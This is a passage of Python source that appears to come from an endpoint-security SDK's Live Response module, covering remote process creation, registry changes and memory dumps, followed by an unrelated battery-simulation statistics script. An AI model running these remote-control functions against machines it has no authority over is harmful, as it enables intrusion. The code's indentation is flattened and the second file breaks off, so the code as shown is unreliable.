#
def kill_process(self, pid, async_mode=False):
"""
Terminate a process on the remote machine.
Args:
pid (int): Process ID to be terminated.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
bool: True if success, False if failure.
"""
data = {"name": "kill", "pid": pid}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id,
timeout=10,
delay=0.1))
try:
self._poll_command(command_id, timeout=10, delay=0.1)
except TimeoutError:
return False
return True
def create_process(self, command_string, wait_for_output=True, remote_output_file_name=None,
working_directory=None, wait_timeout=30, wait_for_completion=True, async_mode=False):
"""
Create a new process on the remote machine with the specified command string.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... print(lr_session.create_process(r'cmd.exe /c "ping.exe 192.168.1.1"'))
Pinging 192.168.1.1 with 32 bytes of data:
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Args:
command_string (str): Command string used for the create process operation.
wait_for_output (bool): True to block on output from the new process (execute in foreground).
This will also set wait_for_completion (below).
remote_output_file_name (str): The remote output file name used for process output.
working_directory (str): The working directory of the create process operation.
wait_timeout (int): Timeout used for this command.
wait_for_completion (bool): True to wait until the process is completed before returning.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
str: The output of the process.
"""
# process is:
# - create a temporary file name
# - create the process, writing output to a temporary file
# - wait for the process to complete
# - get the temporary file from the endpoint
# - delete the temporary file
def wait_to_complete_command():
if wait_for_completion:
self._poll_command(command_id, timeout=wait_timeout)
if wait_for_output:
# now the file is ready to be read
file_content = self.get_file(data["output_file"])
# delete the file
self._lr_post_command({"name": "delete file", "path": data["output_file"]})
return file_content
else:
return None
if wait_for_output:
wait_for_completion = True
data = {"name": "create process", "path": command_string, "wait": wait_for_completion}
if wait_for_output and not remote_output_file_name:
randfilename = self._random_file_name()
data["output_file"] = randfilename
if working_directory:
data["working_directory"] = working_directory
if remote_output_file_name:
data["output_file"] = remote_output_file_name
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: wait_to_complete_command())
else:
return wait_to_complete_command()
def list_processes(self, async_mode=False):
r"""
List currently running processes on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... print(lr_session.list_processes()[0])
{u'command_line': u'',
u'create_time': 1476260500,
u'parent': 0,
u'parent_guid': u'00000001-0000-0000-0000-000000000000',
u'path': u'',
u'pid': 4,
u'proc_guid': u'00000001-0000-0004-01d2-2461a85e4546',
u'sid': u's-1-5-18',
u'username': u'NT AUTHORITY\\SYSTEM'}
Args:
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
list: A list of dicts describing the processes.
"""
data = {"name": "process list"}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id).get(
"processes", []))
return self._poll_command(command_id).get("processes", [])
#
# Registry operations
#
# returns dictionary with 2 entries ("values" and "sub_keys")
# "values" is a list containing a dictionary for each registry value in the key
# "sub_keys" is a list containing one entry for each sub_key
def list_registry_keys_and_values(self, regkey, async_mode=False):
r"""
Enumerate subkeys and values of the specified registry key on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
>>> pprint.pprint(lr_session.list_registry_keys_and_values('HKLM\\SYSTEM\\CurrentControlSet\\services\\ACPI'))
{'sub_keys': [u'Parameters', u'Enum'],
'values': [{u'value_data': 0,
u'value_name': u'Start',
u'value_type': u'REG_DWORD'},
{u'value_data': 1,
u'value_name': u'Type',
u'value_type': u'REG_DWORD'},
{u'value_data': 3,
u'value_name': u'ErrorControl',
u'value_type': u'REG_DWORD'},
{u'value_data': u'system32\\drivers\\ACPI.sys',
u'value_name': u'ImagePath',
u'value_type': u'REG_EXPAND_SZ'},
{u'value_data': u'Microsoft ACPI Driver',
u'value_name': u'DisplayName',
u'value_type': u'REG_SZ'},
{u'value_data': u'Boot Bus Extender',
u'value_name': u'Group',
u'value_type': u'REG_SZ'},
{u'value_data': u'acpi.inf_x86_neutral_ddd3c514822f1b21',
u'value_name': u'DriverPackageId',
u'value_type': u'REG_SZ'},
{u'value_data': 1,
u'value_name': u'Tag',
u'value_type': u'REG_DWORD'}]}
Args:
regkey (str): The registry key to enumerate.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
dict: A dictionary with two keys, 'sub_keys' (a list of subkey names) and 'values' (a list of dicts
containing value data, name, and type).
"""
def _list_registry_keys_and_values():
"""Helper function for list registry keys and values"""
raw_output = self._poll_command(command_id)
return {'values': raw_output.get('values', []), 'sub_keys': raw_output.get('sub_keys', [])}
data = {"name": "reg enum key", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: _list_registry_keys_and_values())
return _list_registry_keys_and_values()
# returns a list containing a dictionary for each registry value in the key
def list_registry_values(self, regkey, async_mode=False):
"""
Enumerate all registry values from the specified registry key on the remote machine.
Args:
regkey (str): The registry key to enumerate.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
list: List of values for the registry key.
"""
data = {"name": "reg enum key", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id).get(
"values", []))
return self._poll_command(command_id).get("values", [])
# returns a dictionary with the registry value
def get_registry_value(self, regkey, async_mode=False):
r"""
Return the associated value of the specified registry key on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
>>> pprint.pprint(lr_session.get_registry_value('HKLM\\SYSTEM\\CurrentControlSet\\services\\ACPI\\Start'))
{u'value_data': 0, u'value_name': u'Start', u'value_type': u'REG_DWORD'}
Args:
regkey (str): The registry key to retrieve.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
dict: A dictionary with keys of: value_data, value_name, value_type.
"""
data = {"name": "reg query value", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id).get(
"value", {}))
return self._poll_command(command_id).get("value", {})
def set_registry_value(self, regkey, value, overwrite=True, value_type=None, async_mode=False):
r"""
Set a registry value on the specified registry key on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... lr_session.set_registry_value('HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\ACPI\\\\testvalue', 1)
Args:
regkey (str): The registry key to set.
value (object): The value data.
overwrite (bool): If True, any existing value will be overwritten.
value_type (str): The type of value. Examples: REG_DWORD, REG_MULTI_SZ, REG_SZ
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
real_value = value
if value_type is None:
if type(value) == int:
value_type = "REG_DWORD"
elif type(value) == list:
value_type = "REG_MULTI_SZ"
real_value = [str(item) for item in list(value)]
else:
value_type = "REG_SZ"
real_value = str(value)
data = {"name": "reg set value", "path": regkey, "overwrite": overwrite, "value_type": value_type,
"value_data": real_value}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
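    # Illustrative sketch, not part of the SDK: when value_type is omitted,
    # set_registry_value infers the registry type from the Python type as above.
    #
    #     lr_session.set_registry_value(key, 1)            # int  -> REG_DWORD
    #     lr_session.set_registry_value(key, ['a', 'b'])   # list -> REG_MULTI_SZ
    #     lr_session.set_registry_value(key, 'some text')  # str  -> REG_SZ
    #
    # where `key` is a full value path such as
    # 'HKLM\\SYSTEM\\CurrentControlSet\\services\\ACPI\\testvalue'.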
def create_registry_key(self, regkey, async_mode=False):
"""
Create a new registry key on the remote machine.
Args:
regkey (str): The registry key to create.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "reg create key", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def delete_registry_key(self, regkey, async_mode=False):
"""
Delete a registry key on the remote machine.
Args:
regkey (str): The registry key to delete.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "reg delete key", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def delete_registry_value(self, regkey, async_mode=False):
"""
Delete a registry value on the remote machine.
Args:
regkey (str): The registry value to delete.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "reg delete value", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
#
# Physical memory capture
#
def memdump(self, local_filename, remote_filename=None, compress=False, async_mode=False):
"""
Perform a memory dump operation on the remote machine.
Args:
local_filename (str): Name of the file the memory dump will be transferred to on the local machine.
remote_filename (str): Name of the file the memory dump will be stored in on the remote machine.
compress (bool): True to compress the file on the remote system.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
def _memdump():
"""Helper function for memdump"""
dump_object.wait()
dump_object.get(local_filename)
dump_object.delete()
dump_object = self.start_memdump(remote_filename=remote_filename, compress=compress)
if async_mode:
return dump_object.memdump_id, self._async_submit(lambda arg, kwarg: _memdump())
_memdump()
def start_memdump(self, remote_filename=None, compress=True):
"""
Start a memory dump operation on the remote machine.
Args:
remote_filename (str): Name of the file the memory dump will be stored in on the remote machine.
compress (bool): True to compress the file on the remote system.
Returns:
LiveResponseMemdump: Controlling object for the memory dump operation.
"""
if not remote_filename:
remote_filename = self._random_file_name()
data = {"name": "memdump", "path": remote_filename, "compress": compress}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if compress:
remote_filename += ".zip"
return LiveResponseMemdump(self, command_id, remote_filename)
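    # Illustrative sketch, not part of the SDK: start_memdump() gives finer control
    # than memdump(); the steps below mirror what memdump() does internally.
    #
    #     dump = lr_session.start_memdump(compress=True)
    #     dump.wait()                    # poll until the remote dump completes
    #     dump.get('local_dump.zip')     # stream the dump down to a local file
    #     dump.delete()                  # remove the temporary file on the endpoint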
def _random_file_name(self):
randfile = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(12)])
if self.os_type == 1:
workdir = 'c:\\windows\\temp'
else:
workdir = '/tmp'
return self._path_compose(workdir, f'cblr.{randfile}.tmp')
def _poll_command(self, command_id, **kwargs):
return poll_status(self._cb, "{cblr_base}/sessions/{0}/commands/{1}".format(self.session_id, command_id,
cblr_base=self.cblr_base),
**kwargs)
def _upload_file(self, fp):
resp = self._cb.session.post("{cblr_base}/sessions/{0}/files".format(self.session_id, cblr_base=self.cblr_base),
files={"file": fp}).json()
return resp.get('id')
def _lr_post_command(self, data):
retries = self.MAX_RETRY_COUNT
if "name" in data and data["name"] not in self.session_data["supported_commands"]:
raise ApiError("Command {0} not supported by this device".format(data["name"]))
while retries:
try:
data["session_id"] = self.session_id
resp = self._cb.post_object("{cblr_base}/sessions/{0}/commands".format(self.session_id,
cblr_base=self.cblr_base), data)
except ObjectNotFoundError as e:
try:
error_message = json.loads(e.message)
if error_message["error_code"] == "NOT_FOUND":
self.session_id, self.session_data = \
self._cblr_manager._get_or_create_session(self.device_id)
retries -= 1
continue
except Exception:
pass
raise ApiError("Received 404 error from server: {0}".format(e.message))
else:
return resp
raise TimeoutError(message="Command {0} failed after {1} retries".format(data["name"], self.MAX_RETRY_COUNT))
class LiveResponseMemdump(object):
"""Object managing a memory dump on a remote machine."""
def __init__(self, lr_session, memdump_id, remote_filename):
"""
Initialize the LiveResponseMemdump.
Args:
lr_session (Session): The Live Response session to the machine doing the memory dump.
memdump_id (str): The ID of the memory dump being performed.
remote_filename (str): The file name the memory dump will be stored in on the remote machine.
"""
self.lr_session = lr_session
self.memdump_id = memdump_id
self.remote_filename = remote_filename
self._done = False
self._error = None
def get(self, local_filename):
"""
Retrieve the remote memory dump to a local file.
Args:
local_filename (str): Filename locally that will receive the memory dump.
"""
if not self._done:
self.wait()
if self._error:
raise self._error
src = self.lr_session.get_raw_file(self.remote_filename, timeout=3600, delay=5)
dst = open(local_filename, "wb")
shutil.copyfileobj(src, dst)
def wait(self):
"""Wait for the remote memory dump to complete."""
self.lr_session._poll_command(self.memdump_id, timeout=3600, delay=5)
self._done = True
def delete(self):
"""Delete the memory dump file."""
self.lr_session.delete_file(self.remote_filename)
def jobrunner(callable, cb, device_id):
"""
Wrap a callable object with a live response session.
Args:
callable (object): The object to be wrapped.
cb (BaseAPI): The CBC SDK object reference.
device_id (int): The device ID to use to get the session.
Returns:
object: The wrapped object.
"""
with cb.select(Device, device_id).lr_session() as sess:
return callable(sess)
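# Illustrative sketch, not part of the SDK: jobrunner() runs a plain callable that
# accepts a Live Response session against a single device. The callable name and
# device ID below are hypothetical.
#
#     def collect_hosts_file(session):
#         return session.get_file(r'c:\windows\system32\drivers\etc\hosts')
#
#     contents = jobrunner(collect_hosts_file, cb, 12345)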
class WorkItem(object):
"""Work item for scheduling."""
def __init__(self, fn, device_id):
"""
Initialize the WorkItem.
Args:
fn (func): The function to be called to do the actual work.
device_id (object): The device ID or Device object the work item is directed for.
"""
self.fn = fn
if isinstance(device_id, Device):
self.device_id = device_id.id
else:
self.device_id = int(device_id)
self.future = _base.Future()
class CompletionNotification(object):
"""The notification that an operation is complete."""
def __init__(self, device_id):
"""
Initialize the CompletionNotification.
Args:
device_id (int): The device ID this notification is for.
"""
self.device_id = device_id
class WorkerStatus(object):
"""Holds the status of an individual worker."""
def __init__(self, device_id, status="READY", exception=None):
"""
Initialize the WorkerStatus.
Args:
device_id (int): The device ID this status is for.
status (str): The current status value.
exception (Exception): Any exception that happened.
"""
self.device_id = device_id
self.status = status
self.exception = exception
class JobWorker(threading.Thread):
"""Thread object that executes individual Live Response jobs."""
def __init__(self, cb, device_id, result_queue):
"""
Initialize the JobWorker.
Args:
cb (BaseAPI): The CBC SDK object reference.
device_id (int): The ID of the device being used.
result_queue (Queue): The queue where results are placed.
"""
super(JobWorker, self).__init__()
self.cb = cb
self.device_id = device_id
self.job_queue = queue.Queue()
self.lr_session = None
self.result_queue = result_queue
def run(self):
"""Execute the job worker."""
try:
self.lr_session = self.cb.live_response.request_session(self.device_id)
self.result_queue.put(WorkerStatus(self.device_id, status="READY"))
while True:
work_item = self.job_queue.get(block=True)
if not work_item:
self.job_queue.task_done()
return
self.run_job(work_item)
self.result_queue.put(CompletionNotification(self.device_id))
self.job_queue.task_done()
except Exception as e:
self.result_queue.put(WorkerStatus(self.device_id, status="ERROR", exception=e))
finally:
if self.lr_session:
self.lr_session.close()
            self.result_queue.put(WorkerStatus(self.device_id, status="EXITING"))
def run_job(self, work_item):
"""
Execute an individual WorkItem.
Args:
work_item (WorkItem): The work item to execute.
"""
try:
work_item.future.set_result(work_item.fn(self.lr_session))
except Exception as e:
work_item.future.set_exception(e)
class LiveResponseJobScheduler(threading.Thread):
"""Thread that schedules Live Response jobs."""
daemon = True
def __init__(self, cb, max_workers=10):
"""
Initialize the LiveResponseJobScheduler.
Args:
cb (BaseAPI): The CBC SDK object reference.
max_workers (int): Maximum number of JobWorker threads to use.
"""
super(LiveResponseJobScheduler, self).__init__()
self._cb = cb
self._job_workers = {}
self._idle_workers = set()
self._unscheduled_jobs = defaultdict(list)
self._max_workers = max_workers
self.schedule_queue = queue.Queue()
def run(self):
"""Execute the job scheduler."""
log.debug("Starting Live Response Job Scheduler")
while True:
log.debug("Waiting for item on Scheduler Queue")
item = self.schedule_queue.get(block=True)
log.debug("Got item: {0}".format(item))
if isinstance(item, WorkItem):
# new WorkItem available
self._unscheduled_jobs[item.device_id].append(item)
elif isinstance(item, CompletionNotification):
# job completed
self._idle_workers.add(item.device_id)
elif isinstance(item, WorkerStatus):
if item.status == "ERROR":
log.error("Error encountered by JobWorker[{0}]: {1}".format(item.device_id,
item.exception))
# Don't reattempt error'd jobs
del self._unscheduled_jobs[item.device_id]
                elif item.status == "EXITING":
log.debug("JobWorker[{0}] has exited, waiting...".format(item.device_id))
self._job_workers[item.device_id].join()
log.debug("JobWorker[{0}] deleted".format(item.device_id))
del self._job_workers[item.device_id]
try:
self._idle_workers.remove(item.device_id)
except KeyError:
pass
elif item.status == "READY":
log.debug("JobWorker[{0}] now ready to accept jobs, session established".format(item.device_id))
self._idle_workers.add(item.device_id)
else:
log.debug("Unknown status from JobWorker[{0}]: {1}".format(item.device_id, item.status))
else:
log.debug("Received unknown item on the scheduler Queue, exiting")
# exiting the scheduler if we get None
# TODO: wait for all worker threads to exit
return
self._schedule_jobs()
def _schedule_jobs(self):
log.debug("Entering scheduler")
# First, see if there are new jobs to schedule on idle workers.
self._schedule_existing_workers()
# If we have jobs scheduled to run on devices with no current associated worker, let's spawn new ones.
if set(self._unscheduled_jobs.keys()) - self._idle_workers:
self._cleanup_idle_workers()
self._spawn_new_workers()
self._schedule_existing_workers()
def _cleanup_idle_workers(self, max=None):
if not max:
max = self._max_workers
for device in list(self._idle_workers)[:max]:
log.debug("asking worker for device id {0} to exit".format(device))
self._job_workers[device].job_queue.put(None)
def _schedule_existing_workers(self):
log.debug("There are idle workers for device ids {0}".format(self._idle_workers))
intersection = self._idle_workers.intersection(set(self._unscheduled_jobs.keys()))
log.debug("{0} jobs ready to execute in existing execution slots".format(len(intersection)))
for device in intersection:
item = self._unscheduled_jobs[device].pop(0)
self._job_workers[device].job_queue.put(item)
self._idle_workers.remove(item.device_id)
self._cleanup_unscheduled_jobs()
def _cleanup_unscheduled_jobs(self):
marked_for_deletion = []
for k in self._unscheduled_jobs.keys():
if len(self._unscheduled_jobs[k]) == 0:
marked_for_deletion.append(k)
for k in marked_for_deletion:
del self._unscheduled_jobs[k]
def submit_job(self, work_item):
"""
Submit a new job to be processed.
Args:
work_item (WorkItem): New job to be processed.
"""
self.schedule_queue.put(work_item)
def _spawn_new_workers(self):
if len(self._job_workers) >= self._max_workers:
return
from datetime import datetime, timedelta
now = datetime.utcnow()
delta = timedelta(minutes=60)
dformat = '%Y-%m-%dT%H:%M:%S.%fZ'
devices = [s for s in self._cb.select(Device)
if s.id in self._unscheduled_jobs and s.id not in self._job_workers
and now - datetime.strptime(s.last_contact_time, dformat) < delta] # noqa: W503
log.debug("Spawning new workers to handle these devices: {0}".format(devices))
for device in devices:
if len(self._job_workers) >= self._max_workers:
break
log.debug("Spawning new JobWorker for device id {0}".format(device.id))
self._job_workers[device.id] = JobWorker(self._cb, device.id, self.schedule_queue)
self._job_workers[device.id].start()
class CbLRManagerBase(object):
"""Live Response manager object."""
cblr_base = "" # override in subclass for each product
cblr_session_cls = NotImplemented # override in subclass for each product
def __init__(self, cb, timeout=30, keepalive_sessions=False, thread_pool_count=5):
"""
Initialize the CbLRManagerBase object.
Args:
cb (BaseAPI): The CBC SDK object reference.
timeout (int): Timeout to use for requests, in seconds.
keepalive_sessions (bool): If True, "ping" sessions occasionally to ensure they stay alive.
thread_pool_count (int): number of workers for async commands (optional)
"""
self._timeout = timeout
self._cb = cb
self._sessions = {}
self._session_lock = threading.RLock()
self._keepalive_sessions = keepalive_sessions
self._init_poll_delay = 1
self._init_poll_timeout = 360
self._async_executor = None
self._thread_pool_count = thread_pool_count
if keepalive_sessions:
self._cleanup_thread_running = True
self._cleanup_thread_event = threading.Event()
self._cleanup_thread = threading.Thread(target=self._session_keepalive_thread)
self._cleanup_thread.daemon = True
self._cleanup_thread.start()
self._job_scheduler = None
def _async_submit(self, func, *args, **kwargs):
"""
Submit a task to the executor, creating it if it doesn't yet exist.
Args:
func (func): A callable to be executed as a background task.
*args (list): Arguments to be passed to the callable.
**kwargs (dict): Keyword arguments to be passed to the callable.
Returns:
Future: A future object representing the background task, which will pass along the result.
"""
if not self._async_executor:
self._async_executor = ThreadPoolExecutor(max_workers=self._thread_pool_count)
return self._async_executor.submit(func, args, kwargs)
def submit_job(self, job, device):
"""
Submit a new job to be executed as a Live Response.
Args:
job (object): The job to be scheduled.
device (int): ID of the device to use for job execution.
Returns:
Future: A reference to the running job.
"""
if self._job_scheduler is None:
# spawn the scheduler thread
self._job_scheduler = LiveResponseJobScheduler(self._cb)
self._job_scheduler.start()
work_item = WorkItem(job, device)
self._job_scheduler.submit_job(work_item)
return work_item.future
def _maintain_sessions(self):
delete_list = []
with self._session_lock:
for session in iter(self._sessions.values()):
if not self._cleanup_thread_running:
break
if session._refcount == 0:
delete_list.append(session.device_id)
else:
try:
self._send_keepalive(session.session_id)
except ObjectNotFoundError:
log.debug("Session {0} for device {1} not valid any longer, removing from cache"
.format(session.session_id, session.device_id))
delete_list.append(session.device_id)
except Exception:
log.debug(("Keepalive on session {0} (device {1}) failed with unknown error, "
"removing from cache").format(session.session_id, session.device_id))
delete_list.append(session.device_id)
for device_id in delete_list:
self._close_session(self._sessions[device_id].session_id)
del self._sessions[device_id]
def _session_keepalive_thread(self):
log.debug("Starting Live Response scheduler cleanup task")
while self._cleanup_thread_running:
self._cleanup_thread_event.wait(self._timeout)
if self._cleanup_thread_running:
self._maintain_sessions()
log.debug("Ending Live Response scheduler cleanup task")
def stop_keepalive_thread(self):
"""Stops the keepalive thread."""
if self._keepalive_sessions:
self._cleanup_thread_running = False
self._cleanup_thread_event.set()
def request_session(self, device_id, async_mode=False):
"""
Initiate a new Live Response session.
Args:
            device_id (int): The device ID to use.
            async_mode (bool): Flag showing whether the session should be requested asynchronously.
        Returns:
            CbLRSessionBase: The new Live Response session, or a (session_id, Future) tuple in async mode.
"""
def _return_existing_session():
self._sessions[device_id]._refcount += 1
return session
def _get_session_obj():
_, session_data = self._wait_create_session(device_id, session_id)
session = self.cblr_session_cls(self, session_id, device_id, session_data=session_data)
return session
def _create_and_store_session():
session = _get_session_obj()
self._sessions[device_id] = session
return session
if self._keepalive_sessions:
with self._session_lock:
if device_id in self._sessions:
session = self._sessions[device_id]
if async_mode:
return session.session_id, self._async_submit(lambda arg, kwarg: _return_existing_session())
return _return_existing_session()
else:
session_id = self._create_session(device_id)
if async_mode:
return session_id, self._async_submit(lambda arg, kwarg: _create_and_store_session())
return _create_and_store_session()
else:
session_id = self._create_session(device_id)
if async_mode:
return session_id, self._async_submit(lambda arg, kwarg: _get_session_obj())
return _get_session_obj()
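    # Illustrative sketch, not part of the SDK: with keepalive_sessions=True the manager
    # caches one session per device and reference-counts it, so paired request_session /
    # close_session calls on the same device reuse the cached session.
    #
    #     session = cb.live_response.request_session(device_id)
    #     try:
    #         session.list_processes()
    #     finally:
    #         cb.live_response.close_session(device_id, session.session_id)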
def close_session(self, device_id, session_id):
"""
Close the specified Live Response session.
Args:
device_id (int): ID of the device.
session_id (int): ID of the session.
"""
if self._keepalive_sessions:
with self._session_lock:
try:
self._sessions[device_id]._refcount -= 1
except KeyError:
pass
else:
self._close_session(session_id)
def _send_keepalive(self, session_id):
log.debug("Sending keepalive message for session id {0}".format(session_id))
self._cb.get_object("{cblr_base}/sessions/{0}/keepalive".format(session_id, cblr_base=self.cblr_base))
class LiveResponseSession(CbLRSessionBase):
"""Public face of the Live Response session object."""
def __init__(self, cblr_manager, session_id, device_id, session_data=None):
"""
Initializes the LiveResponseSession.
Args:
cblr_manager (LiveResponseSessionManager): Reference to the session manager.
session_id (str): The ID of this session.
device_id (int): The ID of the device (remote machine) we're connected to.
session_data (dict): Additional session data.
"""
super(LiveResponseSession, self).__init__(cblr_manager, session_id, device_id, session_data=session_data)
device_info = self._cb.select(Device, self.device_id)
self.os_type = OS_LIVE_RESPONSE_ENUM.get(device_info.os, None)
class LiveResponseSessionManager(CbLRManagerBase):
"""Session manager for Live Response sessions."""
cblr_base = "/appservices/v6/orgs/{}/liveresponse"
cblr_session_cls = LiveResponseSession
def __init__(self, cb, timeout=30, keepalive_sessions=False):
"""Initialize the LiveResponseSessionManager - only needed to format cblr_base"""
super(LiveResponseSessionManager, self).__init__(cb, timeout, keepalive_sessions)
self.cblr_base = self.cblr_base.format(cb.credentials.org_key)
def submit_job(self, job, device):
"""
Submit a job for execution by the job scheduler.
Args:
job (func): The job function to be executed.
device (object): The device ID or Device object the job will be executed on.
Returns:
Future: A Future that will allow waiting until the job is complete.
"""
if self._job_scheduler is None:
# spawn the scheduler thread
self._job_scheduler = LiveResponseJobScheduler(self._cb)
self._job_scheduler.start()
work_item = WorkItem(job, device)
self._job_scheduler.submit_job(work_item)
return work_item.future
def _get_or_create_session(self, device_id):
session_id = self._create_session(device_id)
return self._wait_create_session(device_id, session_id)
def session_status(self, session_id):
"""
        Check the status of a Live Response session.
Args:
session_id (str): The id of the session.
Returns:
str: Status of the session
"""
url = "{cblr_base}/sessions/{0}".format(session_id, cblr_base=self.cblr_base)
res = self._cb.get_object(url)
return res['status'].upper()
def _wait_create_session(self, device_id, session_id):
try:
res = poll_status(self._cb, "{cblr_base}/sessions/{0}".format(session_id,
cblr_base=self.cblr_base),
desired_status="ACTIVE", delay=self._init_poll_delay, timeout=self._init_poll_timeout)
except Exception:
# "close" the session, otherwise it will stay in a pending state
self._close_session(session_id)
# the Cb server will return a 404 if we don't establish a session in time, so convert this to a "timeout"
raise TimeoutError(uri="{cblr_base}/sessions/{0}".format(session_id, cblr_base=self.cblr_base),
message="Could not establish session with device {0}".format(device_id),
error_code=404)
else:
return session_id, res
def _close_session(self, session_id):
try:
self._cb.delete_object("{cblr_base}/sessions/{0}".format(session_id, cblr_base=self.cblr_base))
except Exception:
pass
def _create_session(self, device_id):
response = self._cb.post_object("{cblr_base}/sessions".format(cblr_base=self.cblr_base),
{"device_id": device_id}).json()
return response["id"]
class GetFileJob(object):
"""Object that retrieves a file via Live Response."""
def __init__(self, file_name):
"""
Initialize the GetFileJob.
Args:
file_name (str): The name of the file to be fetched.
"""
self._file_name = file_name
def run(self, session):
"""
Execute the file transfer.
Args:
session (CbLRSessionBase): The Live Response session being used.
Returns:
str: The contents of the file being retrieved.
"""
return session.get_file(self._file_name)
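# Illustrative sketch, not part of the SDK: a GetFileJob is meant to be handed to the
# manager's submit_job(), which provisions a Live Response session on a worker thread
# and passes it to the job callable.
#
#     job = GetFileJob(r'c:\windows\system32\drivers\etc\hosts')
#     future = cb.live_response.submit_job(job.run, device_id)
#     contents = future.result()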
# TODO: adjust the polling interval and also provide a callback function to report progress
def poll_status(cb, url, desired_status="COMPLETE", timeout=None, delay=None):
"""
Poll the status of a Live Response query.
Args:
cb (BaseAPI): The CBC SDK object reference.
url (str): The URL to poll.
desired_status (str): The status we're looking for.
timeout (int): The timeout value in seconds.
delay (float): The delay between attempts in seconds.
Returns:
object: The result of the Live Response query that has the desired status.
Raises:
LiveResponseError: If an error response was encountered.
"""
start_time = time.time()
status = None
if not timeout:
timeout = 120
if not delay:
delay = 0.5
while status != desired_status and time.time() - start_time < timeout:
res = cb.get_object(url)
log.debug(f"url: {url} -> status: {res['status']}")
if res["status"].upper() == desired_status:
log.debug(json.dumps(res))
return res
elif res["status"].upper() == "ERROR":
raise LiveResponseError(res)
elif res["status"].upper() == "CANCELLED":
raise ApiError('The command has been cancelled.')
else:
time.sleep(delay)
raise TimeoutError(uri=url, message="timeout polling for Live Response")
|
generate_baseline_stats.py
|
"""Generate statistics for baseline"""
import numpy as np
import pickle
import click
import multiprocessing
time = np.arange(0.1, 50, 1)
sim_dt = 0.1
def gen_phase1(return_dict):
from buildup.fenics_.phase1 import phis, phie, cs, ce, j
return_dict["phase1_"] = {
"phis": phis.main(time=time, get_test_stats=True),
"phie": phie.main(time=time, get_test_stats=True),
"cs": cs.main(time=time, get_test_stats=True),
"ce": ce.main(time=time, get_test_stats=True),
"j": j.main(time=time, get_test_stats=True),
}
def gen_phase1t(return_dict):
from buildup.fenics_.phase1t import cs, ce
return_dict["phase1t_"] = {
"cs": cs.main(start_time=time[0], dt=sim_dt, stop_time=time[-1], plot_time=time, get_test_stats=True),
"ce": ce.main(start_time=time[0], dt=sim_dt, stop_time=time[-1], plot_time=time, get_test_stats=True),
}
def gen_phase2(return_dict):
from buildup.fenics_.phase2 import phis_newton, phie, cs, ce
return_dict["phase2_"] = {
"phis": phis_newton.main(time=time, dt=sim_dt, get_test_stats=True),
"phie": phie.main(time=time, dt=sim_dt, get_test_stats=True),
"cs": cs.main(time=time, dt=sim_dt, get_test_stats=True),
"ce": ce.main(time=time, dt=sim_dt, get_test_stats=True),
}
def gen_phase2t(return_dict):
from buildup.fenics_.phase2t import cs, ce
return_dict["phase2t_"] = {
"cs": cs.main(start_time=time[0], dt=sim_dt, stop_time=time[-1], plot_time=time, get_test_stats=True),
"ce": ce.main(start_time=time[0], dt=sim_dt, stop_time=time[-1], plot_time=time, get_test_stats=True),
}
@click.command()
@click.argument("path")
def main(path):
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = [
multiprocessing.Process(target=gen_phase1, args=(return_dict,)),
multiprocessing.Process(target=gen_phase1t, args=(return_dict,)),
multiprocessing.Process(target=gen_phase2, args=(return_dict,)),
multiprocessing.Process(target=gen_phase2t, args=(return_dict,)),
]
for j in jobs:
j.start()
for j in jobs:
j.join()
d = dict(return_dict)
data = dict()
for k, v in d.items():
for k1, v1 in v.items():
            data[k + k1] = v1
data.update({"time": time, "sim_dt": sim_dt})
with open(path, "wb") as file:
        pickle.dump(data, file)
if __name__ == "__main__":
main()
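# Illustrative sketch, not part of the original script: loading the generated baseline
# back for comparison, assuming the script was run as
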